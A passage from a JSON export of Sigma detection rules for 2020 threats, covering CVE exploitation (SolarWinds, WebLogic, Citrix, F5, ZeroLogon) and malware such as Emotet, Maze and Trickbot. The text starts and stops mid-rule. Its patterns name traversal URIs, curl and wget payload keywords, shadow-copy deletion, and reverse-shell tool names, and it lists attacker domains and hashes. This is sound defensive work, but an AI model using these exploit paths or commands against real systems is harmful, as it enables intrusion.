    "content": "title: CVE-2020-10148 SolarWinds Orion API Auth Bypass\nid: 5a35116f-43bc-4901-b62d-ef131f42a9af\nstatus: test\ndescription: Detects CVE-2020-10148 SolarWinds Orion API authentication bypass attempts\nreferences:\n    - https://kb.cert.org/vuls/id/843464\nauthor: Bhabesh Raj, Tim Shelton\ndate: 2020-12-27\nmodified: 2023-01-02\ntags:\n    - attack.initial-access\n    - attack.t1190\n    - cve.2020-10148\n    - detection.emerging-threats\nlogsource:\n    category: webserver\ndetection:\n    selection:\n        cs-uri-query|contains:\n            - '/WebResource.axd'\n            - '/ScriptResource.axd'\n            - '/i18n.ashx'\n            - '/Skipi18n'\n    selection2:\n        cs-uri-query|contains:\n            - '/SolarWinds/'\n            - '/api/'\n    valid_request_1:\n        cs-uri-query|contains: 'Orion/Skipi18n/Profiler/'\n    valid_request_2:\n        cs-uri-query|contains:\n            - 'css.i18n.ashx'\n            - 'js.i18n.ashx'\n    condition: all of selection* and not 1 of valid_request_*\nfalsepositives:\n    - Unknown\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2020/Exploits/CVE-2020-10189/proc_creation_win_exploit_cve_2020_10189.yml",
    "content": "title: Exploited CVE-2020-10189 Zoho ManageEngine\nid: 846b866e-2a57-46ee-8e16-85fa92759be7\nstatus: test\ndescription: Detects the exploitation of Zoho ManageEngine Desktop Central Java Deserialization vulnerability reported as CVE-2020-10189\nreferences:\n    - https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html\n    - https://vulmon.com/exploitdetails?qidtp=exploitdb&qid=48224\nauthor: Florian Roth (Nextron Systems)\ndate: 2020-03-25\nmodified: 2023-01-21\ntags:\n    - attack.initial-access\n    - attack.t1190\n    - attack.execution\n    - attack.t1059.001\n    - attack.t1059.003\n    - attack.s0190\n    - cve.2020-10189\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: 'DesktopCentral_Server\\jre\\bin\\java.exe'\n        Image|endswith:\n            - '\\cmd.exe'\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n            - '\\bitsadmin.exe'\n            - '\\systeminfo.exe'\n            - '\\net.exe'\n            - '\\net1.exe'\n            - '\\reg.exe'\n            - '\\query.exe'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2020/Exploits/CVE-2020-1048/proc_creation_win_exploit_cve_2020_1048.yml",
    "content": "title: Suspicious PrinterPorts Creation (CVE-2020-1048)\nid: cc08d590-8b90-413a-aff6-31d1a99678d7\nstatus: test\ndescription: Detects new commands that add new printer port which point to suspicious file\nreferences:\n    - https://windows-internals.com/printdemon-cve-2020-1048/\nauthor: EagleEye Team, Florian Roth\ndate: 2020-05-13\nmodified: 2021-11-27\ntags:\n    - attack.persistence\n    - attack.execution\n    - attack.t1059.001\n    - cve.2020-1048\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection1:\n        CommandLine|contains: 'Add-PrinterPort -Name'\n    selection2:\n        CommandLine|contains:\n            - '.exe'\n            - '.dll'\n            - '.bat'\n    selection3:\n        CommandLine|contains: 'Generic / Text Only'\n    condition: (selection1 and selection2) or selection3\nfalsepositives:\n    - New printer port install on host\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2020/Exploits/CVE-2020-1048/registry_set_exploit_cve_2020_1048_new_printer_port.yml",
    "content": "title: CVE-2020-1048 Exploitation Attempt - Suspicious New Printer Ports - Registry\nid: 7ec912f2-5175-4868-b811-ec13ad0f8567\nstatus: test\ndescription: |\n    Detects changes to the \"Ports\" registry key with data that includes a Windows path or a file with a suspicious extension.\n    This could be an attempt to exploit CVE-2020-1048 - a Windows Print Spooler elevation of privilege vulnerability.\nreferences:\n    - https://windows-internals.com/printdemon-cve-2020-1048/\nauthor: EagleEye Team, Florian Roth (Nextron Systems), NVISO\ndate: 2020-05-13\nmodified: 2024-03-25\ntags:\n    - attack.persistence\n    - attack.execution\n    - attack.defense-evasion\n    - attack.t1112\n    - cve.2020-1048\n    - detection.emerging-threats\nlogsource:\n    product: windows\n    category: registry_set\ndetection:\n    selection:\n        TargetObject|contains: '\\Microsoft\\Windows NT\\CurrentVersion\\Ports'\n        Details|contains:\n            - '.bat'\n            - '.com'\n            - '.dll'\n            - '.exe'\n            - '.ps1'\n            - '.vbe'\n            - '.vbs'\n            - 'C:'\n    condition: selection\nfalsepositives:\n    - New printer port install on host\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2020/Exploits/CVE-2020-1350/proc_creation_win_exploit_cve_2020_1350.yml",
    "content": "title: DNS RCE CVE-2020-1350\nid: b5281f31-f9cc-4d0d-95d0-45b91c45b487\nstatus: test\ndescription: Detects exploitation of DNS RCE bug reported in CVE-2020-1350 by the detection of suspicious sub process\nreferences:\n    - https://research.checkpoint.com/2020/resolving-your-way-into-domain-admin-exploiting-a-17-year-old-bug-in-windows-dns-servers/\n    - https://web.archive.org/web/20230329172447/https://blog.menasec.net/2019/02/threat-hunting-24-microsoft-windows-dns.html\nauthor: Florian Roth (Nextron Systems)\ndate: 2020-07-15\nmodified: 2022-07-12\ntags:\n    - attack.initial-access\n    - attack.t1190\n    - attack.execution\n    - attack.t1569.002\n    - cve.2020-1350\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\System32\\dns.exe'\n    filter:\n        Image|endswith:\n            - '\\System32\\werfault.exe'\n            - '\\System32\\conhost.exe'\n            - '\\System32\\dnscmd.exe'\n            - '\\System32\\dns.exe'\n    condition: selection and not filter\nfalsepositives:\n    - Unknown but benign sub processes of the Windows DNS service dns.exe\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2020/Exploits/CVE-2020-1472/proc_creation_win_exploit_cve_2020_1472_zero_poc.yml",
    "content": "title: Exploitation Attempt Of CVE-2020-1472 - Execution of ZeroLogon PoC\nid: dcc6a01e-9471-44a0-a699-71ea96f8ed8b\nstatus: test\ndescription: Detects the execution of the commonly used ZeroLogon PoC executable.\nreferences:\n    - https://thedfirreport.com/2021/11/01/from-zero-to-domain-admin/\n    - https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/\nauthor: '@Kostastsale, TheDFIRReport'\ndate: 2022-02-12\ntags:\n    - attack.execution\n    - attack.lateral-movement\n    - attack.t1210\n    - cve.2020-1472\n    - detection.emerging-threats\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_main:\n        ParentImage|endswith: '\\cmd.exe'\n        Image|endswith:\n            - '\\cool.exe'\n            - '\\zero.exe'\n        CommandLine|contains|all:\n            - 'Administrator'\n            - '-c'\n    selection_payloads_1:\n        CommandLine|contains|all:\n            - 'taskkill'\n            - '/f'\n            - '/im'\n    selection_payloads_2:\n        CommandLine|contains: 'powershell'\n    condition: selection_main and 1 of selection_payloads_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2020/Exploits/CVE-2020-14882/web_cve_2020_14882_weblogic_exploit.yml",
    "content": "title: Oracle WebLogic Exploit CVE-2020-14882\nid: 85d466b0-d74c-4514-84d3-2bdd3327588b\nstatus: test\ndescription: Detects exploitation attempts on WebLogic servers\nreferences:\n    - https://isc.sans.edu/diary/26734\n    - https://twitter.com/jas502n/status/1321416053050667009?s=20\n    - https://twitter.com/sudo_sudoka/status/1323951871078223874\nauthor: Florian Roth (Nextron Systems)\ndate: 2020-11-02\nmodified: 2023-01-02\ntags:\n    - attack.t1190\n    - attack.initial-access\n    - cve.2020-14882\n    - detection.emerging-threats\nlogsource:\n    category: webserver\ndetection:\n    selection:\n        cs-uri-query|contains:\n            - '/console/images/%252E%252E%252Fconsole.portal'\n            - '/console/css/%2e'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2020/Exploits/CVE-2020-28188/web_cve_2020_28188_terramaster_rce_exploit.yml",
    "content": "title: TerraMaster TOS CVE-2020-28188\nid: 15c312b9-00d0-4feb-8870-7d940a4bdc5e\nstatus: test\ndescription: Detects the exploitation of the TerraMaster TOS vulnerability described in CVE-2020-28188\nreferences:\n    - https://www.ihteam.net/advisory/terramaster-tos-multiple-vulnerabilities/\n    - https://research.checkpoint.com/2021/freakout-leveraging-newest-vulnerabilities-for-creating-a-botnet/\nauthor: Bhabesh Raj\ndate: 2021-01-25\nmodified: 2023-01-02\ntags:\n    - attack.t1190\n    - attack.initial-access\n    - cve.2020-28188\n    - detection.emerging-threats\nlogsource:\n    category: webserver\ndetection:\n    base_url:\n        cs-method: 'GET'\n        cs-uri-query|contains|all:\n            - '/include/makecvs.php'\n            - '?Event='\n    payload:\n        cs-uri-query|contains:\n            - 'curl'\n            - 'wget'\n            - '.py'\n            - '.sh'\n            - 'chmod'\n            - '_GET'\n    condition: base_url and payload\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2020/Exploits/CVE-2020-3452/web_cve_2020_3452_cisco_asa_ftd.yml",
    "content": "title: Cisco ASA FTD Exploit CVE-2020-3452\nid: aba47adc-4847-4970-95c1-61dce62a8b29\nstatus: test\ndescription: Detects exploitation attempts on Cisco ASA FTD systems exploiting CVE-2020-3452 with a status code of 200 (sccessful exploitation)\nreferences:\n    - https://twitter.com/aboul3la/status/1286012324722155525\n    - https://github.com/darklotuskdb/CISCO-CVE-2020-3452-Scanner-Exploiter\nauthor: Florian Roth (Nextron Systems)\ndate: 2021-01-07\nmodified: 2023-01-02\ntags:\n    - attack.t1190\n    - attack.initial-access\n    - cve.2020-3452\n    - detection.emerging-threats\nlogsource:\n    category: webserver\ndetection:\n    selection_endpoint:\n        cs-uri-query|contains:\n            - '+CSCOT+/translation-table'\n            - '+CSCOT+/oem-customization'\n    selection_path_select:\n        cs-uri-query|contains:\n            - '&textdomain=/'\n            - '&textdomain=%'\n            - '&name=/'\n            - '&name=%'\n    select_status_code:\n        sc-status: 200\n    condition: selection_endpoint and selection_path_select and select_status_code\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2020/Exploits/CVE-2020-5902/web_cve_2020_5902_f5_bigip.yml",
    "content": "title: CVE-2020-5902 F5 BIG-IP Exploitation Attempt\nid: 44b53b1c-e60f-4a7b-948e-3435a7918478\nstatus: test\ndescription: Detects the exploitation attempt of the vulnerability found in F5 BIG-IP and described in CVE-2020-5902\nreferences:\n    - https://support.f5.com/csp/article/K52145254\n    - https://www.ptsecurity.com/ww-en/about/news/f5-fixes-critical-vulnerability-discovered-by-positive-technologies-in-big-ip-application-delivery-controller/\n    - https://twitter.com/yorickkoster/status/1279709009151434754\n    - https://www.criticalstart.com/f5-big-ip-remote-code-execution-exploit/\nauthor: Florian Roth (Nextron Systems)\ndate: 2020-07-05\nmodified: 2023-01-02\ntags:\n    - attack.initial-access\n    - attack.t1190\n    - cve.2020-5902\n    - detection.emerging-threats\nlogsource:\n    category: webserver\ndetection:\n    selection_base:\n        cs-uri-query|contains:\n            - '/tmui/'\n            - '/hsqldb'\n    selection_traversal:\n        cs-uri-query|contains:\n            - '..;/'\n            - '.jsp/..'\n    condition: selection_base and selection_traversal\nfalsepositives:\n    - Unknown\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2020/Exploits/CVE-2020-8193/web_cve_2020_8193_8195_citrix_exploit.yml",
    "content": "title: Citrix ADS Exploitation CVE-2020-8193 CVE-2020-8195\nid: 0d0d9a8a-a49e-4e27-b061-7ce4b936cfb7\nstatus: test\ndescription: Detects exploitation attempt against Citrix Netscaler, Application Delivery Controller (ADS) and Citrix Gateway exploiting vulnerabilities reported as CVE-2020-8193 and CVE-2020-8195\nreferences:\n    - https://support.citrix.com/article/CTX276688\n    - https://research.nccgroup.com/2020/07/10/rift-citrix-adc-vulnerabilities-cve-2020-8193-cve-2020-8195-and-cve-2020-8196-intelligence/\n    - https://dmaasland.github.io/posts/citrix.html\nauthor: Florian Roth (Nextron Systems)\ndate: 2020-07-10\nmodified: 2023-01-02\ntags:\n    - attack.initial-access\n    - attack.t1190\n    - cve.2020-8193\n    - cve.2020-8195\n    - detection.emerging-threats\nlogsource:\n    category: webserver\ndetection:\n    selection1:\n        cs-uri-query|contains: '/rapi/filedownload?filter=path:%2F'\n    selection2:\n        cs-uri-query|contains|all:\n            - '/pcidss/report'\n            - 'type=all_signatures'\n            - 'sig_name=_default_signature_'\n    condition: 1 of selection*\nfalsepositives:\n    - Unknown\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2020/Malware/Blue-Mockingbird/proc_creation_win_malware_blue_mockingbird.yml",
    "content": "title: Blue Mockingbird\nid: c3198a27-23a0-4c2c-af19-e5328d49680e\nrelated:\n    - id: ce239692-aa94-41b3-b32f-9cab259c96ea\n      type: merged\nstatus: test\ndescription: Attempts to detect system changes made by Blue Mockingbird\nreferences:\n    - https://redcanary.com/blog/blue-mockingbird-cryptominer/\nauthor: Trent Liffick (@tliffick)\ndate: 2020-05-14\nmodified: 2022-10-09\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.execution\n    - attack.t1112\n    - attack.t1047\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    sc_cmd:\n        Image|endswith: '\\cmd.exe'\n        CommandLine|contains|all:\n            - 'sc config'\n            - 'wercplsupporte.dll'\n    wmic_cmd:\n        Image|endswith: '\\wmic.exe'\n        CommandLine|endswith: 'COR_PROFILER'\n    condition: sc_cmd or wmic_cmd\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2020/Malware/Blue-Mockingbird/registry_set_mal_blue_mockingbird.yml",
    "content": "title: Blue Mockingbird - Registry\nid: 92b0b372-a939-44ed-a11b-5136cf680e27\nrelated:\n    - id: c3198a27-23a0-4c2c-af19-e5328d49680e\n      type: derived\nstatus: test\ndescription: Attempts to detect system changes made by Blue Mockingbird\nreferences:\n    - https://redcanary.com/blog/blue-mockingbird-cryptominer/\nauthor: Trent Liffick (@tliffick)\ndate: 2020-05-14\nmodified: 2023-08-17\ntags:\n    - attack.defense-evasion\n    - attack.execution\n    - attack.persistence\n    - attack.t1112\n    - attack.t1047\n    - detection.emerging-threats\nlogsource:\n    product: windows\n    category: registry_set\ndetection:\n    selection:\n        TargetObject|endswith: '\\CurrentControlSet\\Services\\wercplsupport\\Parameters\\ServiceDll'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2020/Malware/ComRAT/proxy_malware_comrat_network_indicators.yml",
    "content": "title: ComRAT Network Communication\nid: 7857f021-007f-4928-8b2c-7aedbe64bb82\nstatus: test\ndescription: Detects Turla ComRAT network communication.\nreferences:\n    - https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf\nauthor: Florian Roth (Nextron Systems)\ndate: 2020-05-26\nmodified: 2024-02-26\ntags:\n    - attack.defense-evasion\n    - attack.command-and-control\n    - attack.t1071.001\n    - attack.g0010\n    - detection.emerging-threats\nlogsource:\n    category: proxy\ndetection:\n    selection:\n        c-uri|contains: '/index/index.php\\?h='\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2020/Malware/Emotet/proc_creation_win_malware_emotet_rundll32_execution.yml",
    "content": "title: Potential Emotet Rundll32 Execution\nid: 54e57ce3-0672-46eb-a402-2c0948d5e3e9\nstatus: test\ndescription: Detecting Emotet DLL loading by looking for rundll32.exe processes with command lines ending in ,RunDLL or ,Control_RunDLL\nreferences:\n    - https://paste.cryptolaemus.com/emotet/2020/12/22/emotet-malware-IoCs_12-22-20.html\n    - https://cyber.wtf/2021/11/15/guess-whos-back/\nauthor: FPT.EagleEye\ndate: 2020-12-25\nmodified: 2023-02-21\ntags:\n    - attack.defense-evasion\n    - attack.t1218.011\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\rundll32.exe'\n        - OriginalFileName: 'RUNDLL32.EXE'\n    selection_cli:\n        CommandLine|endswith:\n            - ',RunDLL'\n            - ',Control_RunDLL'\n            # - ',#1'  too generic - function load by ordinal is not Emotet specific\n    filter_legitimate_dll:\n        CommandLine|endswith:\n            - '.dll,Control_RunDLL'\n            - '.dll\",Control_RunDLL'\n            - '.dll'',Control_RunDLL'\n    filter_ide:\n        ParentImage|endswith: '\\tracker.exe' # When Visual Studio compile NodeJS program, it might use MSBuild to create tracker.exe and then, the tracker.exe fork rundll32.exe\n    condition: all of selection_* and not 1 of filter_*\nfalsepositives:\n    - Unknown\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2020/Malware/FlowCloud/registry_event_malware_flowcloud_markers.yml",
    "content": "title: FlowCloud Registry Markers\nid: 5118765f-6657-4ddb-a487-d7bd673abbf1\nstatus: test\ndescription: |\n    Detects FlowCloud malware registry markers from threat group TA410.\n    The malware stores its configuration in the registry alongside drivers utilized by the malware's keylogger components.\nreferences:\n    - https://www.proofpoint.com/us/blog/threat-insight/ta410-group-behind-lookback-attacks-against-us-utilities-sector-returns-new\nauthor: NVISO\ndate: 2020-06-09\nmodified: 2024-03-20\ntags:\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.t1112\n    - detection.emerging-threats\nlogsource:\n    product: windows\n    category: registry_event\ndetection:\n    selection:\n        TargetObject|contains:\n            - '\\HARDWARE\\{2DB80286-1784-48b5-A751-B6ED1F490303}'\n            - '\\HARDWARE\\{804423C2-F490-4ac3-BFA5-13DEDE63A71A}'\n            - '\\HARDWARE\\{A5124AF5-DF23-49bf-B0ED-A18ED3DEA027}'\n            - '\\SYSTEM\\Setup\\PrintResponsor\\'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2020/Malware/Ke3chang-TidePool/proc_creation_win_malware_ke3chang_tidepool.yml",
    "content": "title: Potential Ke3chang/TidePool Malware Activity\nid: 7b544661-69fc-419f-9a59-82ccc328f205\nstatus: test\ndescription: Detects registry modifications potentially related to the Ke3chang/TidePool malware as seen in campaigns running in 2019 and 2020\nreferences:\n    - https://web.archive.org/web/20200618080300/https://www.verfassungsschutz.de/embed/broschuere-2020-06-bfv-cyber-brief-2020-01.pdf\n    - https://unit42.paloaltonetworks.com/operation-ke3chang-resurfaces-with-new-tidepool-malware/\nauthor: Markus Neis, Swisscom\ndate: 2020-06-18\nmodified: 2023-03-10\ntags:\n    - attack.g0004\n    - attack.defense-evasion\n    - attack.t1562.001\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        # Ke3chang and TidePool both modify the IEHarden registry key, as well as the following list of keys.\n        # Setting these registry keys is unique to the Ke3chang and TidePool malware families.\n        # HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Check_Associations\n        # HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\DisableFirstRunCustomize\n        # HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\IEharden\n        CommandLine|contains:\n            - '-Property DWORD -name DisableFirstRunCustomize -value 2 -Force'\n            - '-Property String -name Check_Associations -value'\n            - '-Property DWORD -name IEHarden -value 0 -Force'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2020/Malware/Maze/proc_creation_win_malware_maze_ransomware.yml",
    "content": "title: Potential Maze Ransomware Activity\nid: 29fd07fc-9cfd-4331-b7fd-cc18dfa21052\nstatus: test\ndescription: Detects specific process characteristics of Maze ransomware word document droppers\nreferences:\n    - https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html\n    - https://app.any.run/tasks/51e7185c-52d7-4efb-ac0d-e86340053473/\n    - https://app.any.run/tasks/65a79440-373a-4725-8d74-77db9f2abda4/\nauthor: Florian Roth (Nextron Systems)\ndate: 2020-05-08\nmodified: 2023-02-13\ntags:\n    - attack.execution\n    - attack.t1204.002\n    - attack.t1047\n    - attack.impact\n    - attack.t1490\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    # Dropper\n    selection1:\n        ParentImage|endswith: '\\WINWORD.exe'\n        Image|endswith: '.tmp'\n    # Binary Execution\n    selection2:\n        Image|endswith: '\\wmic.exe'\n        ParentImage|contains: '\\Temp\\'\n        CommandLine|endswith: 'shadowcopy delete'\n    # Specific Pattern\n    selection3:\n        CommandLine|endswith: 'shadowcopy delete'\n        CommandLine|contains: '\\..\\..\\system32'\n    condition: 1 of selection*\nfalsepositives:\n    - Unlikely\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2020/Malware/Trickbot/proc_creation_win_malware_trickbot_wermgr.yml",
    "content": "title: Trickbot Malware Activity\nid: 58bf96d9-ff5f-44bd-8dcc-1c4f79bf3a27\nrelated:\n    - id: c37510b8-2107-4b78-aa32-72f251e7a844\n      type: similar\nstatus: stable\ndescription: Detects Trickbot malware process tree pattern in which \"rundll32.exe\" is a parent of \"wermgr.exe\"\nreferences:\n    - https://twitter.com/swisscom_csirt/status/1331634525722521602?s=20\n    - https://app.any.run/tasks/f74c5157-8508-4ac6-9805-d63fe7b0d399/\nauthor: Florian Roth (Nextron Systems)\ndate: 2020-11-26\nmodified: 2021-11-27\ntags:\n    - attack.execution\n    - attack.t1559\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\wermgr.exe'\n        ParentImage|endswith: '\\rundll32.exe'\n        ParentCommandLine|contains: 'DllRegisterServer'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2020/TA/Evilnum/proc_creation_win_apt_evilnum_jul20.yml",
    "content": "title: EvilNum APT Golden Chickens Deployment Via OCX Files\nid: 8acf3cfa-1e8c-4099-83de-a0c4038e18f0\nstatus: test\ndescription: Detects Golden Chickens deployment method as used by Evilnum and described in ESET July 2020 report\nreferences:\n    - https://www.welivesecurity.com/2020/07/09/more-evil-deep-look-evilnum-toolset/\n    - https://app.any.run/tasks/33d37fdf-158d-4930-aa68-813e1d5eb8ba/\nauthor: Florian Roth (Nextron Systems)\ndate: 2020-07-10\nmodified: 2023-03-09\ntags:\n    - attack.defense-evasion\n    - attack.t1218.011\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains|all:\n            - 'regsvr32'\n            - '/s'\n            - '/i'\n            - '\\AppData\\Roaming\\'\n            - '.ocx'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2020/TA/GALLIUM/proc_creation_win_apt_gallium_iocs.yml",
    "content": "title: GALLIUM IOCs\nid: 440a56bf-7873-4439-940a-1c8a671073c2\nstatus: test\ndescription: Detects artifacts associated with GALLIUM cyber espionage group as reported by Microsoft Threat Intelligence Center in the December 2019 report.\nreferences:\n    - https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/\n    - https://github.com/Azure/Azure-Sentinel/blob/a02ce85c96f162de6f8cc06f07a53b6525f0ff7f/Solutions/Legacy%20IOC%20based%20Threat%20Protection/Analytic%20Rules/GalliumIOCs.yaml\nauthor: Tim Burrell\ndate: 2020-02-07\nmodified: 2024-11-23\ntags:\n    - attack.credential-access\n    - attack.command-and-control\n    - attack.t1212\n    - attack.t1071\n    - attack.g0093\n    - detection.emerging-threats\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection:\n        Hashes|contains:\n            - 'SHA256=9ae7c4a4e1cfe9b505c3a47e66551eb1357affee65bfefb0109d02f4e97c06dd'\n            - 'SHA256=7772d624e1aed327abcd24ce2068063da0e31bb1d5d3bf2841fc977e198c6c5b'\n            - 'SHA256=657fc7e6447e0065d488a7db2caab13071e44741875044f9024ca843fe4e86b5'\n            - 'SHA256=2ef157a97e28574356e1d871abf75deca7d7a1ea662f38b577a06dd039dbae29'\n            - 'SHA256=52fd7b90d7144ac448af4008be639d4d45c252e51823f4311011af3207a5fc77'\n            - 'SHA256=a370e47cb97b35f1ae6590d14ada7561d22b4a73be0cb6df7e851d85054b1ac3'\n            - 'SHA256=5bf80b871278a29f356bd42af1e35428aead20cd90b0c7642247afcaaa95b022'\n            - 'SHA256=6f690ccfd54c2b02f0c3cb89c938162c10cbeee693286e809579c540b07ed883'\n            - 'SHA256=3c884f776fbd16597c072afd81029e8764dd57ee79d798829ca111f5e170bd8e'\n            - 'SHA256=1922a419f57afb351b58330ed456143cc8de8b3ebcbd236d26a219b03b3464d7'\n            - 'SHA256=fe0e4ef832b62d49b43433e10c47dc51072959af93963c790892efc20ec422f1'\n            - 'SHA256=7ce9e1c5562c8a5c93878629a47fe6071a35d604ed57a8f918f3eadf82c11a9c'\n            - 'SHA256=178d5ee8c04401d332af331087a80fb4e5e2937edfba7266f9be34a5029b6945'\n            - 'SHA256=51f70956fa8c487784fd21ab795f6ba2199b5c2d346acdeef1de0318a4c729d9'\n            - 'SHA256=889bca95f1a69e94aaade1e959ed0d3620531dc0fc563be9a8decf41899b4d79'\n            - 'SHA256=332ddaa00e2eb862742cb8d7e24ce52a5d38ffb22f6c8bd51162bd35e84d7ddf'\n            - 'SHA256=44bcf82fa536318622798504e8369e9dcdb32686b95fcb44579f0b4efa79df08'\n            - 'SHA256=63552772fdd8c947712a2cff00dfe25c7a34133716784b6d486227384f8cf3ef'\n            - 'SHA256=056744a3c371b5938d63c396fe094afce8fb153796a65afa5103e1bffd7ca070'\n            - 'SHA1=53a44c2396d15c3a03723fa5e5db54cafd527635'\n            - 'SHA1=9c5e496921e3bc882dc40694f1dcc3746a75db19'\n            - 'SHA1=aeb573accfd95758550cf30bf04f389a92922844'\n            - 'SHA1=79ef78a797403a4ed1a616c68e07fff868a8650a'\n            - 'SHA1=4f6f38b4cec35e895d91c052b1f5a83d665c2196'\n            - 'SHA1=1e8c2cac2e4ce7cbd33c3858eb2e24531cb8a84d'\n            - 'SHA1=e841a63e47361a572db9a7334af459ddca11347a'\n            - 'SHA1=c28f606df28a9bc8df75a4d5e5837fc5522dd34d'\n            - 'SHA1=2e94b305d6812a9f96e6781c888e48c7fb157b6b'\n            - 'SHA1=dd44133716b8a241957b912fa6a02efde3ce3025'\n            - 'SHA1=8793bf166cb89eb55f0593404e4e933ab605e803'\n            - 'SHA1=a39b57032dbb2335499a51e13470a7cd5d86b138'\n            - 'SHA1=41cc2b15c662bc001c0eb92f6cc222934f0beeea'\n            - 'SHA1=d209430d6af54792371174e70e27dd11d3def7a7'\n            - 'SHA1=1c6452026c56efd2c94cea7e0f671eb55515edb0'\n            - 'SHA1=c6b41d3afdcdcaf9f442bbe772f5da871801fd5a'\n            - 'SHA1=4923d460e22fbbf165bbbaba168e5a46b8157d9f'\n            - 'SHA1=f201504bd96e81d0d350c3a8332593ee1c9e09de'\n            - 'SHA1=ddd2db1127632a2a52943a2fe516a2e7d05d70d2'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2020/TA/GALLIUM/win_dns_analytic_apt_gallium.yml",
    "content": "title: GALLIUM Artefacts - Builtin\nid: 3db10f25-2527-4b79-8d4b-471eb900ee29\nrelated:\n    - id: 440a56bf-7873-4439-940a-1c8a671073c2\n      type: derived\nstatus: test\ndescription: Detects artefacts associated with activity group GALLIUM - Microsoft Threat Intelligence Center indicators released in December 2019.\nreferences:\n    - https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/\n    - https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/dn800669(v=ws.11)\nauthor: Tim Burrell\ndate: 2020-02-07\nmodified: 2023-01-02\ntags:\n    - attack.credential-access\n    - attack.command-and-control\n    - attack.t1071\n    - detection.emerging-threats\nlogsource:\n    product: windows\n    service: dns-server-analytic\n    definition: 'Requirements: Microsoft-Windows-DNS-Server/Analytical ({EB79061A-A566-4698-9119-3ED2807060E7}) Event Log must be collected in order to receive the events.'\ndetection:\n    selection:\n        EventID: 257\n        QNAME:\n            - 'asyspy256.ddns.net'\n            - 'hotkillmail9sddcc.ddns.net'\n            - 'rosaf112.ddns.net'\n            - 'cvdfhjh1231.myftp.biz'\n            - 'sz2016rose.ddns.net'\n            - 'dffwescwer4325.myftp.biz'\n            - 'cvdfhjh1231.ddns.net'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2020/TA/Greenbug/proc_creation_win_apt_greenbug_may20.yml",
    "content": "title: Greenbug Espionage Group Indicators\nid: 3711eee4-a808-4849-8a14-faf733da3612\nstatus: test\ndescription: Detects tools and process executions used by Greenbug in their May 2020 campaign as reported by Symantec\nreferences:\n    - https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/greenbug-espionage-telco-south-asia\nauthor: Florian Roth (Nextron Systems)\ndate: 2020-05-20\nmodified: 2023-03-09\ntags:\n    - attack.g0049\n    - attack.execution\n    - attack.t1059.001\n    - attack.command-and-control\n    - attack.t1105\n    - attack.defense-evasion\n    - attack.t1036.005\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        Image|endswith:\n            - ':\\ProgramData\\adobe\\Adobe.exe'\n            - ':\\ProgramData\\oracle\\local.exe'\n            - '\\revshell.exe'\n            - '\\infopagesbackup\\ncat.exe'\n            